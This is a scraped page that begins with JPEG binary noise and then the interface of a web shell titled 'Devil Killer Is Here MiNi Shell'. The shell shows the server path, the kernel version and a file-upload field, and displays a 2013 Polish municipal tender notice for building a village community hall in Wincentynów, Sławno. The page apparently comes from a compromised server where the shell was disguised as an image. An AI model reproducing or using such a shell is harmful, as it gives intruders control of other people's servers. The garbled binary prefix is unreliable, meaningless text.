JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/293438-N-2013.html

<p class="kh_header"><b>Sławno: Budowa budynku świetlicy wiejskiej z infrastrukturą techniczną  w miejscowości 
             Wincentynów</b><br>
<b>Numer ogłoszenia: 293438 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 044 755-18-50, faks 044 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku świetlicy wiejskiej z infrastrukturą techniczną  w miejscowości 
             Wincentynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia jest  Budowa budynku świetlicy wiejskiej z infrastrukturą 
techniczną  w miejscowości Wincentynów
  Miejsce realizacji zadania: woj. łódzkie, powiat opoczyński, gmina Sławno, 
kod   pocztowy:  26 - 332 Sławno, miejscowość Wincentynów, działka nr 460/2, 463 
o kubaturze 966,83 m3
2. Realizacja zadania w jednym etapie.

  3. Zakres  realizacji zadania:
Lp.	Wyszczególnienie zakresu rzeczowego

A	Budowa budynku świetlicy wiejskiej z infrastrukturą techniczną w miejscowości Wincentynów
1.		Podłoża pod posadzki
2.		Ściany parteru
3.		Słupy
4.		Strop
5.		Zbrojenie
6.		Ściany poddasza i kominy
7.		Konstrukcja i pokrycie dachu
8.		Ścianki działowe
9.		Tynki wewnętrzne
10.		Stolarka okienna
11.		Stolarka i ślusarka drzwiowa
12.		Okładziny wewnętrzne ścian
13.		Posadzki, podłogi
14.		Malowanie
15.		Elewacja
16.		Pochwyty dla niepełnosprawnych
17.		Podjazd dla osób niepełnosprawnych i schody zewnętrzne do budynku 
18.		Wyposażenie budynku
19.		Ogrodzenie z siatki ocynkowanej
20.	
	Branża drogowa

4.	Szczegółowy zakres robót opisany został w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych.
5.	Zakres  zamówienia nie obejmuje wykonania:
   a) instalacji elektrycznej
   b) instalacji c.o. i wod - kan., c.w.u.
   c) przyłącza  instalacji kanalizacyjnej, wodociągowej, elektrycznej i gazowej,

Zamawiający powyższe roboty  wykona we własnym zakresie.
Powyższe prace będą wykonywane przez zamawiającego równocześnie  z pracami budowlanymi wykonywanymi przez Wykonawcę. 

6.  Kolor w uzgodnieniu z zamawiającym:
       a)  blacha,  obróbki blacharskie, parapety zewnętrzne  ~ odcień   ceglasty,
       b) rynny i rury mają być wykonane z PCV, kolor rynny i rury spustowej odcień ceglasty,
       c)  drzwi zewnętrzne i wewnętrzne ~ dąb złocisty, 
             Klamka na wysokości 105-110 cm od posadzki
        d) okna czyste bez szprosów kolor, od zewnętrznej strony ~dąb złocisty, a od wewnętrznej strony 
              kolor biały,
        e)  ściany wewnątrz pomieszczeń   - odcień żółtego, 
         f) elewacja zewnętrzna - oliwkowy lub podobny ( bonie koloru ciemna pomarańcz )

7.  Zakres zamówienia nie obejmuje wykonania:
    a.  ław fundamentowych budynku,
    b.  ścian fundamentowych budynku
    Zakres z pkt. jw. tj z 7a. i 7b. jest już wykonany przez Zamawiającego.

8. Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z dokumentacją     
    projektową, specyfikacją technicznego wykonania i odbioru robót budowlanych, zasadami wiedzy 
    technicznej i sztuki budowlanej, obowiązującymi przepisami i polskimi normami. 


9.  WYKONAWCA ZOBOWIĄZANY JEST  W RAMACH  W/W  ROBÓT  DO:

1)	Wykonania   przedmiotu   zamówienia   zgodnie  z  dokumentacją projektową, pozwoleniami 
na budowę, technologią wskazaną przez Projektanta, z zasadami wiedzy technicznej, wskazaniami Zamawiającego oraz obowiązującymi przepisami, w szczególności z zapisami zawartymi 
w Specyfikacjach Technicznych Wykonania i Odbioru Robót, załączonymi do niniejszej specyfikacji.

2)	Zabezpieczenia składowanych tymczasowo na placu  budowy materiałów i urządzeń do czasu 
ich wbudowania przed zniszczeniem lub utratą jakości, właściwości lub parametrów.

3)	Zorganizowania zaplecza budowy, podłączenia mediów we własnym zakresie i na swój koszt oraz pokrycia kosztów ich eksploatacji przez cały okres trwania budowy.

4)	Zabezpieczenia terenu robót na czas ich wykonywania przed osobami postronnymi, 
a w szczególności do przeciwdziałania wypadkom z udziałem osób trzecich. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom  trzecim w wyniku prowadzonych prac, 
od dnia przekazania placu budowy do dnia odbioru robót. 

5)	Natychmiastowego usunięcia w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót.

6)	Pokrycia kosztów związanych z bieżącą obsługą geodezyjną inwestycji, w tym odtworzenia na swój koszt  znaków osnowy geodezyjnej w przypadku gdy w/w znaki znajdują się na terenie realizacji robót.

7)	Wykonawca jako wytwórca odpadów w rozumieniu ustawy o odpadach ma obowiązek
    zagospodarowania powstałych podczas realizacji zadania odpadów zgodnie z ustawą o odpadach 
     z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21), i ustawą z dnia 27 kwietnia 2001r. 
     Prawo ochrony środowiska (tj. Dz. U. z 2008 r. Nr 25, poz. 150 z późn. zm.) oraz zgłoszenia 
    informacji o wytwarzanych odpadach, sposobie ich zagospodarowania do Wydziału Ochrony 
    Środowiska Starostwa Powiatowego z kopią do wiadomości Zamawiającego. W cenie oferty 
   Wykonawca ma obowiązek uwzględnić odległość, koszt wywozu i utylizacji odpadów.

8)	Prowadzenia robót rozbiórkowych, montażowych i budowlanych zgodnie z wymogami rozporządzenia Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. nr 47 poz. 401).

9)	 Sporządzenia i przekazania Zamawiającemu planu bezpieczeństwa i ochrony zdrowia, sporządzonego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji   dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia
(Dz. U. z 2003r. Nr 120, poz. 1126). Przekazanie planu BiOZ winno nastąpić w ciągu 14 dni od daty przekazania placu budowy.

10)	 Wykonania inwentaryzacji geodezyjnej powykonawczej. 

11)	Przekazania Zamawiającemu dokumentacji powykonawczej po sprawdzeniu jej kompletności przez Inspektora  Nadzoru, najpóźniej w terminie do dnia podpisania protokołu odbioru końcowego. Wykonawca zobowiązany jest do sporządzenia i przekazania kompleksowej geodezyjnej inwentaryzacji powykonawczej przyjętej do zasobów przez Powiatowy Ośrodek Geodezji (w 3 egzemplarzach) najpóźniej  do dnia podpisania protokołu odbioru końcowego.

12)	Materiały, urządzenia i wyposażenie użyte do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania na terenie RP oraz spełniać warunki określone w ustawie 
z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 z późn. zm.) 
oraz m.in. w Rozporządzeniu Ministra Infrastruktury w sprawie sposobów deklarowania zgodności   wyrobów   budowlanych   oraz   sposobu   znakowania   ich   znakiem budowlanym z 11 sierpnia 2004 r. (Dz. U. z 2004r., Nr 198, poz. 2041). 

13)	Wszystkie nazwy  własne urządzeń i materiałów użyte w dokumentacji przetargowej,  określają  minimalne oczekiwane parametry jakościowe, techniczne oraz wymagany standard, należy je traktować jako propozycje projektanta.  

14)	Dopuszcza się stosowanie materiałów i urządzeń równoważnych, jednak ich parametry techniczne muszą odpowiadać  zaproponowanym w dokumentacji projektowej.

15) Obowiązek udowodnienia równoważności ciąży na Wykonawcy zgodnie z art. 30 ust 5 ustawy Prawo 
        zamówień publicznych.  

16) Wykonawca przedłoży Zamawiającemu dokumenty potwierdzające, iż wszystkie wyroby budowlane użyte do wykonania zamówienia nadają się do stosowania przy wykonywaniu robót budowlanych.

17)   Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty 
          potwierdzające pozwolenie na zastosowanie/wbudowanie (atesty, certyfikaty, aprobaty 
         techniczne, świadectwa jakości itp.). 

18) Wykonawca  przygotuje oraz złoży w formie spiętej wszelkie dokumenty za wykonany 
         przedmiot zamówienia, a zwłaszcza : 

a) 	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich zamontowanych urządzeń, 
b)  protokoły z badania materiałów i urządzeń, 
c)  dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu  
   zamówienia, 
d) inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia,  a odnoszące 
    się do jego realizacji, zwłaszcza rysunki z naniesionymi zmianami w trakcie  realizacji zadania.,
e) inwentaryzację geodezyjną  powykonawczą

19) Wykonawca po wykonaniu robót przygotuje wszelkie wymagane dokumenty do uzyskania 
        niezbędnej decyzji pozwolenia na użytkowanie oraz dokumentację powykonawczą, kosztorys 
        powykonawczy oraz  zobowiązuje się do współpracy w trakcie jej   uzyskania.  
20) Wykonanie robót będzie się uważać za zakończone - odbiór ostateczny, jeżeli odbiór 
         nastąpi bez usterek i Zamawiający uzyska decyzję pozwolenia na użytkowanie.

Uwaga!
Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie mają być wykonywane roboty oraz uzyskał wszelkie niezbędne informacje, w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez zamawiającego które mogą być konieczne do przygotowania oferty oraz zdobył na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty.
Wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM
___________________________________________________________________
    
1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 10.000,00 PLN 
     ( słownie: dziesięć  tysięcy   złotych)

  2.  Wadium  musi być wniesione  przed upływem terminu składania ofert.
  3. Wadium może być wniesione  w jednej lub kilku następujących formach w zależności od wyboru
      Wykonawcy:
	1)	pieniądzu - przelewem na rachunek bankowy  NR  58 8992 0000 0007 8445 2000 0060
z dopiskiem  - 
Budowa budynku świetlicy wiejskiej z infrastrukturą techniczną  
w miejscowości Wincentynów

Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć 
do oferty. 

         Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany 
    przez Zamawiającego rachunek bankowy najpóźniej do dnia i godziny  składania ofert.

	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

należy w formie nienaruszonego oryginału zdeponować w sekretariacie Urzędu Gminy Sławno pokój Nr 13 , a kopię potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 


4. Z treści powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez 
      zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty 
      zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 
      5 ustawy Prawo zamówień publicznych. 

5. Wadium składane przez Konsorcjum w formie poręczeń lub gwarancji ma wskazywać   
     Lidera Konsorcjum i pozostałych konsorcjantów.

 6. Gwarancja lub poręczenie wadium musi dodatkowo zawierać klauzulę wypłaty kwoty  
      wadialnej Zamawiającemu, zarówno wówczas gdy Lider Konsorcjum uchyli się od 
      zawarcia umowy z Zamawiającym w przypadku gdy zostanie wybrana oferta 
      Konsorcjum, jak i wtedy, gdy od zawarcia umowy uchyli się którykolwiek z pozostałych  
     członków Konsorcjum.
7.  Zwrot wadium,  
1.  Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a upzp.
1a.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
2.  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3.  Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych  Zamawiający zatrzyma wadium 
    wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3   
    ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa 
   w art. 25 ust. 1, Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, 
   że   wynika  to z przyczyn nieleżących po jego stronie.

9. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została 
    wybrana:
	1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
	2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

10. Oferta w trakcie trwania procedury przetargowej od dnia składania ofert do dnia podpisania 
       umowy (termin związania ofertą 30 dni) winna być przez cały okres zabezpieczona wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Potencjał kadrowy

 o zamówienie mogą ubiegać się wykonawcy, którzy dysponują  następującą osobą,  
 która po stronie Wykonawcy będzie kierować wykonaniem  zamówienia, mającą 
doświadczenie zawodowe, minimum 5 lat i posiadającymi  n/w uprawnienia do wykonywania  samodzielnych funkcji  technicznych    w  budownictwie:

1) Kierownika budowy - 1 osoba posiadający:
       a) uprawnienia budowlane do kierowania robotami budowlanymi - w specjalności
      konstrukcyjno-budowlanej;
    Wyżej wymieniona osoba powinna legitymować się uprawnieniami budowlanymi do kierowania robotami budowlanymi wymaganymi przepisami ustawy z dnia 
7 lipca 1994 r. - Prawo budowlane ( j. t. Dz. U. z 2010 r. Nr 243, poz. 1623
z późn. zm. ) ( lub odpowiadające im równoważne uprawnienia budowlane do kierowania robotami we właściwej branży i zakresie, które zostały  wydane na podstawie  wcześniej obowiązujących przepisów tj. przed 01.01.1995 r.  ) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2006 r. Nr 83, poz. 578 z późn. zm. ). 
Dla  wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  określone Obwieszczeniem Ministra Infrastruktury z dnia 16 lutego 2009 r. w sprawie wykazu dyplomów i innych dokumentów, wydawanych przez inne niż Rzeczpospolita Polska państwa członkowskie Unii Europejskiej, Konfederację Szwajcarską, państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym, potwierdzających posiadanie kwalifikacji do wykonywania zawodu architekta oraz terminów, w których odbywało się kształcenie. Powyższe  zagadnienie reguluje Ustawa z dnia 
18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. Nr 63 , poz. 394 )
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
 wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  o zamówienie mogą ubiegać się wykonawcy którzy  wykażą, że  posiadają opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia - polisa na wartość nie  mniejszą     niż  150.000,00 PLN .
   W przypadku Wykonawców zagranicznych do przeliczenia wartości występujących w innych 
   walutach niż PLN wartości należy przeliczyć  na PLN na podstawie średniego kursu
   Narodowego Banku Polskiego ( NBP), opublikowanego  w dniu zamieszczenia ogłoszenia 
   w Biuletynie Zamówień  Publicznych.
   Jeżeli w dniu zamieszczenia ogłoszenia w Biuletynie Zamówień  Publicznych NBP 
    nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni 
    kurs waluty publikowany pierwszego dnia, po dniu zamieszczenia  ogłoszenia w Biuletynie 
    Zamówień Publicznych.
   Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, 
   że łącznie spełniają w/w warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.	Dowód wpłaty wadium
3.   Harmonogram - zestawienie rzeczowo - finansowe operacji (wg załączonego wzoru Nr 2 ) 
